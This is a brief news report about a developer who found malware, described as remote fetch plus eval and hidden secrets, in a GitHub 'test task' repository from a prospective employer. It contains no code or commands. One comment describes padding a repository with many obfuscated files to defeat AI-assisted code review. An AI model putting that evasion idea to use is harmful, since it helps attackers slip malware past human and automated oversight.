Python Software Engineer Vladyslav Bashtannyk spoke on LinkedIn about "pretty high-quality malware" that he discovered in a technical test task.
Python Software Engineer Vladyslav Bashtannyk spoke on LinkedIn about "pretty high-quality malware" that he discovered in a technical test task.
Vladislav received a technical test via a GitHub repository. He was asked to complete several tasks, namely: check the backend functionality, add an authorization page, and fix the part with the web3 graph on the dashboard page.
Before launching, the IT guy conducted a security audit of the code and discovered patterns that resembled malware and could lead to remote access to the system or steal tokens/secrets. He reported his findings to his employer.
"While checking the repository before launching, I discovered several critical security issues that prevent me from safely launching it on my local machine. In particular, I found patterns equivalent to remote code execution behavior (dynamic remote fetch + eval execution), unsafe code construction at runtime, suspicious dependency configuration, and hidden secrets inside the repository," Vladislav wrote.
After the developer refused to launch the project locally, it was simply blocked.
Vladyslav used artificial intelligence to check the code.
In the comments to his post, one of the developers noted that such cases happen quite often, and it is safer to use a local virtual machine or a disposable cloud environment to run unfamiliar projects, since even Docker or Podman containers can sometimes be broken into. He also expressed the opinion that AI can help with code analysis, but it is only a matter of time before attackers start deliberately overloading the context with hundreds of obfuscated files to make it difficult to detect dangerous fragments.
At the end of the post, Vladyslav reminded his colleagues: "Do not launch unfamiliar repositories without analysis. Today, a "test task" can cost you very dearly."
